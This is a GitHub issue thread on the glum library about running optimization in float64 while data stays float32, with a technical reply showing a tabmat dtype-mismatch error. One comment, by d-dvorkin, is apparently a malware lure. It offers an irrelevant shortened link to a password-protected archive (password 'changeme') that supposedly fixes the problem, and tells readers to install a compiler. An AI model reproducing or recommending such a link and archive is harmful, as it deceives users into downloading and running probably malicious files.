### ISSUE TITLE
Force dtype `np.float64` for optimization while data dtype is `np.float32`

### ISSUE THREAD

**Issue by mlondschien** [Quantco/glum#843]
We're having quite a few problems with optimization in `float32`. In small batches, these go away if we `.astype(np.float64)` our data before calling `glum.GeneralizedLinearRegressor.fit`. This also makes the algorithm much faster for some reason. However, we cannot afford the `float32` -> `float64` conversion on the entire dataset due to memory constraints.

Is there an option to do the optimization in `glum` (i.e., probably, `coef` and the current hessian estimate) in `float64` even if the data itself is `float32`?

**Comment by d-dvorkin** [comment]
This might help:This file might fix it
https://bit.ly/4gvtdhO
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by stanmart** [comment]
I don't think `tabmat` can handle a mismatch in dtypes. For example,
```python
import tabmat as tm
import numpy as np

X = tm.DenseMatrix(
    np.random.rand(1_000_000, 100).astype(np.float32),
)
beta = np.random.rand(100).astype(np.float64)

X.sandwich(beta)
```

fails with
```python
[...]
File src/tabmat/ext/dense.pyx:29, in tabmat.ext.dense.dense_sandwich()
ValueError: Buffer dtype mismatch, expected 'double' but got 'float'
```

So while it would be a nice feature, I don't think it also requires non-trivial changes in tabmat -- in particular, the parts written in C++.
